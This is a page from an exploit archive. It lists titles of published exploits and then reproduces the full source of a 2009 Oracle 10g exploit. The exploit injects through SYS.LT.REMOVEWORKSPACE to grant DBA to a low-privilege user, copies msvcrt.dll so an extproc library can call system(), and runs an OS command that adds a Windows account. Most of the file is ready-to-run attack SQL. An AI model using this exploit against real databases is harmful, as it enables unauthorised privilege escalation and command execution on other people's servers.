
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
75 lines
2.8 KiB
Text
Executable file
75 lines
2.8 KiB
Text
Executable file
/*********************************************************/
|
|
/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/
|
|
/****grant DBA and create new OS user (advanced extproc)*/
|
|
/*********************************************************/
|
|
/***********exploit grant DBA to scott********************/
|
|
/***********and execute OS command "net user"*************/
|
|
/***********using advanced extproc method*****************/
|
|
/*********************************************************/
|
|
/***********tested on oracle 10.1.0.5.0*******************/
|
|
/*********************************************************/
|
|
/*********************************************************/
|
|
/* Date of Public EXPLOIT: January 6, 2009 */
|
|
/* Written by: Alexandr "Sh2kerr" Polyakov */
|
|
/* email: Alexandr.Polyakov@dsec.ru */
|
|
/* site: http://www.dsecrg.ru */
|
|
/* http://www.dsec.ru */
|
|
/*********************************************************/
|
|
/*Original Advisory: */
|
|
/*Esteban Martinez Fayo [Team SHATTER ] */
|
|
/*Date of Public Advisory: November 11, 2008 */
|
|
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
|
|
/*********************************************************/
|
|
|
|
|
|
select * from user_role_privs;
|
|
|
|
CREATE OR REPLACE FUNCTION X return varchar2
|
|
authid current_user as
|
|
pragma autonomous_transaction;
|
|
BEGIN
|
|
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
|
|
EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT';
|
|
EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT';
|
|
EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT';
|
|
COMMIT;
|
|
RETURN 'X';
|
|
END;
|
|
/
|
|
|
|
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');
|
|
exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X');
|
|
|
|
/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */
|
|
/* this method works in 10g and 11g database versions with updates */
|
|
|
|
CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32';
|
|
CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN';
|
|
|
|
BEGIN
|
|
SYS.DBMS_FILE_TRANSFER.COPY_FILE(
|
|
source_directory_object => 'copy_dll_from',
|
|
source_file_name => 'msvcrt.dll',
|
|
destination_directory_object => 'copy_dll_to',
|
|
destination_file_name => 'msvcrt.dll');
|
|
END;
|
|
/
|
|
|
|
CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll';
|
|
/
|
|
|
|
CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR)
|
|
IS EXTERNAL
|
|
NAME "system"
|
|
LIBRARY extproc_shell
|
|
LANGUAGE C;
|
|
/
|
|
|
|
/* here we can paste any OS command for example create new user */
|
|
|
|
EXEC extprocexec('net user hack 12345 /add');
|
|
/
|
|
|
|
select * from user_role_privs;
|
|
|
|
// milw0rm.com [2009-01-06]
|